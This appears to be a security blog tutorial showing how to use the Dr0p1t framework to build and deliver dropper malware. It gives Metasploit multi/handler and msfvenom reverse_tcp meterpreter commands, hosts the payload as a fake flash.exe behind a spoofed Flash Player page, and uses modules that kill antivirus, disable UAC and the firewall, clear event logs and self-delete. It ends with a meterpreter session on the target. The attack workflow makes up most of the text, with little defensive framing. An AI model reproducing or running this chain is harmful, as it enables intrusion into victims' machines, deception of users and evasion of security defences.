Quantify Cyber Risk Now

header ads

Dr0p1t Framework for generating Dropper Malware | Lucideus Research


Dr0p1t is a framework for generating Dropper Malware.
Dropper : A dropper is a type of malware that’s sole purpose is to download and execute other malware.
Dr0p1t Framework uses several techniques to deliver the payload such as -
  • We can use Dr0p1t Server to use a fake but authentic looking Flash webpage
  • We can use application specific icons
  • The executable size is smaller compared to other droppers generated the same way.
  • Download executable on target system and execute it silently..
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
  • Clear event log after finishing.

Available Modules
  • Find and kill antivirus before running the malware.
  • The ability to disable UAC.
  • The ability to run your malware as admin.
  • Full spoof by spoofing the file icon and extension to any thing you want.
  • ZIP files support so now you can compress your executable to zip file before uploading.
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • After Git-clone and installation...
    cd Dr0p1t-Framework
    python Dr0p1t_server.py

  • Start Metasploit-Framework and setup multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST IP
    set LPORT Port

  • Generate a payload using msfvenom
    msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=PORT -f exe > /var/www/html/flash.exe
    I am using path /var/www/html because our payload will be hosted in Apache Server and this is the default path for apache server.
  • Dr0p1t Server can be accessed on localhost:5000
    This is the default address for Dr0p1t Server
    Let’s explore…

  • This is Drr0p1t Server
    Now lets customize our payload…
    Enter Malware URL : http://IP/flash.exe
    Enable - Disable UAC module
    Enable - Run as Admin module
    Enter Batchfile Script name - disable_firewall.bat
    This bat file comes with Dr0p1t Framework
    Enter Icon name - flash.ico
    This icon file also comes with the package
    Click on Submit
    Now we have customized our payload and we get a download link…
  • Lets see what happens when we open this link on our target machine…

  • This webpage loads when we open the above generated link and it looks exactly like an authentic flash player webpage
  • We can see that UAC and Firewall are enabled, now lets download our payload…

    So, the file we downloaded looks original as we have the same name and icon as that of an original flash player EXE
  • Now let’s execute it.

    On execution we can see that UAC and Firewall both are automatically disabled and clean up is performed in the download directory, after few seconds the malicious flash.exe is automatically removed from the folder and we have successfully installed a backdoor along with cleanup...and on the attacker side.

  • We get a meterpreter session.

Post a comment